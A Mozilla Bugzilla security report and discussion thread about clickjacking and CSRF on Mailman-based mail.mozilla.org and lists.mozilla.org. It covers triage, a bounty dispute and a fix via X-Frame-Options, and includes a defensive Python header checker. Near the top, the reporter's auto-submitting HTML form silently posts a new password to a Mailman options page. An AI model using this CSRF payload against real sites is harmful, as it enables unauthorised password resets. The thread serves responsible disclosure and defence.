Closed Bug 909874 Opened 12 years ago Closed 9 years ago

Clickjacking on mail.mozilla.org and lists.mozilla.org (mailman sites need X-Frame-Options)

Categories: Infrastructure & Operations :: Infrastructure: Mail
Type: task
Priority: Not set
Severity: normal
Tracking: Not tracked
Status: RESOLVED FIXED
People: Reporter: bhattacharya.manish7, Unassigned
References: none
Keywords: reporter-external, sec-low, wsec-headers
Whiteboard: CSRF part covered by bug 890063 [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org]
Attachments: 1 file

User Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130814063812

Steps to reproduce:
Opened https://mail.mozilla.org/options/mozwebqa/bhattacharya.manish7@gmail.com in an iframe and used the following code to reset my password:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Untitled Document</title>
    </head>
    <body>
    <form method="post" name="test" action="https://mail.mozilla.org/options/mozwebqa/bhattacharya.manish7@gmail.com">
    <input type="hidden" value="hello123" name="newpw" />
    <input type="hidden" value="hello123" name="confpw" />
    </form>
    <script type="text/javascript">
    document.test.submit();
    </script>
    </body>
    </html>

As some emails are public on mail.mozilla.org, the attack can be generalised.

Actual results:
The page opened in the iframe, and I also got a password change mail.

Expected results:
There should be an X-Frame-Options header on a page like this, where you don't ask for the old password and change it by just asking for a password and a new password, and there should be a CSRF token submitted with the form.
Assigned to Adam for verification.
Assignee: nobody → amuntner
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Checking this one out. I wasn't subscribed to any lists, so I just subscribed to one; once I have approval to join I'll be able to verify.
Whiteboard: [reporter-external][verif?] → [reporter-external][site:mail.mozilla.org][verif?]
Thanks Manish! Verified. Remediation: To prevent CSRF framing attacks, the application should return a response header with the name X-Frame-Options and the value DENY to prevent framing altogether, or the value SAMEORIGIN to allow framing only by pages on the same origin as the response itself. Asking for the password before allowing it to be changed is also a good idea.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: wsec-csrf
Whiteboard: [reporter-external][site:mail.mozilla.org][verif?] → [reporter-external][site:mail.mozilla.org]
Assignee: amuntner → nobody
Group: mozilla-services-security → websites-security
Component: General → Other
Product: Mozilla Services → Websites
Assignee: nobody → infra
Component: Other → Infrastructure: Mail
Product: Websites → Infrastructure & Operations
QA Contact: limed
Version: unspecified → other
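The remediation above (and the later observation that Mailman 2.1.22 still ships no default X-Frame-Options) comes down to one question for a defender: does the options page come back with a header that stops third-party framing? The checker below is an added example written for this thread, not Mailman or Mozilla code. It evaluates a response's headers the way a browser would, giving a CSP frame-ancestors directive precedence over X-Frame-Options and treating the obsolete ALLOW-FROM form and any unrecognised value as no protection. The header sets in SAMPLE_RESPONSES are constructed, not captured from mail.mozilla.org or lists.mozilla.org.

```python
"""Check HTTP response headers for anti-framing (clickjacking) protection.

Added example for this bug report; it is not Mailman or Mozilla code.
The header sets below are constructed samples, not captured responses.
"""
from __future__ import annotations


def parse_csp(csp: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy value into {directive: [source expressions]}."""
    policy: dict[str, list[str]] = {}
    for clause in csp.split(";"):
        tokens = clause.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def assess_framing(headers: dict[str, str]) -> dict:
    """Decide whether a response can be embedded by an arbitrary third-party page.

    Browser precedence is mirrored: when CSP frame-ancestors is present it
    governs and X-Frame-Options (XFO) is ignored; otherwise XFO applies.
    Returns {'protected': bool, 'mechanism': str | None, 'note': str}.
    """
    lowered = {name.lower(): value for name, value in headers.items()}

    csp = lowered.get("content-security-policy")
    if csp:
        ancestors = parse_csp(csp).get("frame-ancestors")
        if ancestors is not None:
            sources = {s.lower() for s in ancestors}
            if sources == {"'none'"}:
                return {"protected": True, "mechanism": "CSP frame-ancestors 'none'",
                        "note": "framing blocked for all origins"}
            # A wildcard or bare scheme in the allow-list lets any site frame the page.
            if "*" in sources or any(s in ("http:", "https:") for s in sources):
                return {"protected": False, "mechanism": "CSP frame-ancestors",
                        "note": f"allow-list permits any origin: {sorted(sources)}"}
            return {"protected": True, "mechanism": "CSP frame-ancestors",
                    "note": f"framing limited to: {sorted(sources)}"}

    xfo = lowered.get("x-frame-options")
    if xfo is None:
        return {"protected": False, "mechanism": None,
                "note": "no X-Frame-Options or frame-ancestors: any site can frame the page"}
    value = xfo.strip().upper()
    if value == "DENY":
        return {"protected": True, "mechanism": "X-Frame-Options DENY",
                "note": "framing blocked for all origins"}
    if value == "SAMEORIGIN":
        return {"protected": True, "mechanism": "X-Frame-Options SAMEORIGIN",
                "note": "framing limited to the same origin"}
    if value.startswith("ALLOW-FROM"):
        return {"protected": False, "mechanism": "X-Frame-Options ALLOW-FROM",
                "note": "ALLOW-FROM is obsolete and ignored by current browsers; use CSP frame-ancestors"}
    return {"protected": False, "mechanism": "X-Frame-Options",
            "note": f"unrecognised value {xfo!r}; browsers ignore invalid XFO and allow framing"}


# Constructed header sets standing in for responses from a Mailman options page.
SAMPLE_RESPONSES = {
    "mailman default (no header)": {"Content-Type": "text/html; charset=utf-8"},
    "XFO SAMEORIGIN added at web server": {"Content-Type": "text/html; charset=utf-8",
                                           "X-Frame-Options": "SAMEORIGIN"},
    "CSP frame-ancestors none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "obsolete ALLOW-FROM": {"X-Frame-Options": "ALLOW-FROM https://example.org"},
    "CSP overrides XFO": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
}


def audit(samples: dict[str, dict[str, str]] = SAMPLE_RESPONSES) -> dict[str, bool]:
    """Map each sample name to whether its headers block third-party framing."""
    return {name: assess_framing(h)["protected"] for name, h in samples.items()}


if __name__ == "__main__":
    for name, h in SAMPLE_RESPONSES.items():
        r = assess_framing(h)
        print(f"{'OK  ' if r['protected'] else 'FAIL'} {name}: {r['mechanism']} - {r['note']}")
```

The "CSP overrides XFO" sample is the case worth remembering: a strict X-Frame-Options value is silently discarded once a frame-ancestors directive is present, so a permissive CSP added later can undo the fix this bug asked for. Since Mailman itself does not emit the header, the practical place to set it is the web server in front of it, as the later fix bug in this thread did.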
This is obviously a mailman bug... has this been reported to them yet?
Yes! I reported it to them and it has been verified.
Next obvious question then: is there an upstream patch for it yet?
Flags: pending-upstream-fix+
Adam and I suggested the patch, but I don't know whether it has been implemented or not!
Any update on the issue? I am curious about the bounty(?). Hope for the best :)
Somebody please look into this, resolve the issue and update me.
There was a new RC release of Mailman 2.x this weekend, but I don't see that on the release notes.
What happened with the bug bounty??
Adam: which attack did you verify? I don't see where clickjacking comes into this. And if the form is CSRF-able why would you have to load it in a frame?
Flags: needinfo?(amuntner)
Keywords: sec-moderate
Daniel: I reported clickjacking and CSRF as independent issues; both were there at the time of reporting.
It has been 2 months since the bug was reported. Please resolve the issue and update the bounty flag. It is a humble request. Regards, Manish
I think it's waiting on dveditz to confirm if you sufficiently answered his question or not.
Flags: needinfo?(dveditz)
I replied to dveditz: clickjacking and CSRF were two different issues and both had been verified at the time of reporting. But still no response :(
(In reply to Manish Bhattacharya from comment #16)
> i replied to dveditz, clickjacking and CSRF were two different issues and
> both has been verified at the time of reporting.But still no response :(

Right, but he didn't reply yet saying if he saw that and if that was a sufficient answer.
(In reply to Dave Miller [:justdave] (justdave@bugzilla.org) from comment #17)
> (In reply to Manish Bhattacharya from comment #16)
> > i replied to dveditz, clickjacking and CSRF were two different issues and
> > both has been verified at the time of reporting.But still no response :(
>
> Right, but he didn't reply yet saying if he saw that and if that was a
> sufficient answer.

What should I do now? Or just wait for his reply?
(In reply to Manish Bhattacharya from comment #5)
> yes ! i reported them and it has been verified .

Mailman 2.1.16 was just released today, and I don't see any indication of any security content in it.
dveditz - to answer https://bugzilla.mozilla.org/show_bug.cgi?id=909874#c12 it doesn't have to be loaded into a frame to execute the bug. Plain old CSRF works fine too.
Flags: needinfo?(amuntner)
My opinion is that this bug should be marked as a duplicate of https://bugzilla.mozilla.org/show_bug.cgi?id=890063
Great, first do nothing with the report for months, then mark it duplicate. When I reported it and it got verified, where was this 80063? Can I see that?
(In reply to Adam Muntner :adamm from comment #21)
> My opinion is that this bug should be marked as a duplicate of
> https://bugzilla.mozilla.org/show_bug.cgi?id=890063

There are two issues, CSRF and clickjacking; are both duplicates?
Please, somebody, update the case and the flags associated :)
Severity: normal → major
Please do not bump bug severity, there is a needinfo flag for :dveditz and we are just waiting on info, nothing more to do here but wait for his response
Severity: major → normal
It's been more than a month; I am still waiting :(
The more serious problem, the csrf, is a duplicate of bug 890063 which I've CC'd you on. You never answered my question about clickjacking but the only attackable control I see is the unsubscribe button. That would be an annoying Denial of Service so we should fix it (by preventing framing) but would not be worth a bug bounty.
Flags: sec-bounty?
Flags: sec-bounty-
Flags: needinfo?(dveditz)
Summary: csrf and clickjacking on mail.mozilla.org → unsubscribe clickjacking on mail.mozilla.org (mailman sites need X-Frame-Options)
Whiteboard: [reporter-external][site:mail.mozilla.org] → [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org]
Whiteboard: [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org] → CSRF part covered by bug 890063 [reporter-external][site:mail.mozilla.org][site:lisits.mozilla.org]
There's also a confirmation step on the unsubscribe button because the options page is (usually) unauthenticated.
But just because you guys use the same software over two sites, that means it's a duplicate? Please! I reported on the other domain, so technically I deserve something. Really disappointing, and I replied to all your messages.
Yes, the mailman installations on our newsgroups/lists gateway (lists.mozilla.org, 63.245.216.66) and our non-gatewayed lists (mail.mozilla.org, 63.245.216.65) are managed as a unit. Since the problem is in the upstream mailman code and not in a per-site configuration setting they are duplicate issues. This bug does not qualify for the bug bounty on that basis. It's also not on our list of sites participating in the bug bounty program, which is primarily focused on the sites and services that would affect millions of Firefox users rather than the developers served by our mailing lists. http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs The "extraordinary" bugs referred to in the section below the list are generally ones that compromise the machine itself, not bugs in the web app (otherwise the site would be listed).
Summary: unsubscribe clickjacking on mail.mozilla.org (mailman sites need X-Frame-Options) → Clickjacking on mail.mozilla.org and lists.mozilla.org (mailman sites need X-Frame-Options)
There is still no default XFO setting in Mailman 2.1.22, so presumably nobody has told them and/or none of their development team cares. I will open up a bug to implement XFO on these two sites.
Yes, April, please.
Depends on: 1287197
Fixed in bug 1287197.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Group: websites-security
Keywords: wsec-dos, wsec-headers
Great, April.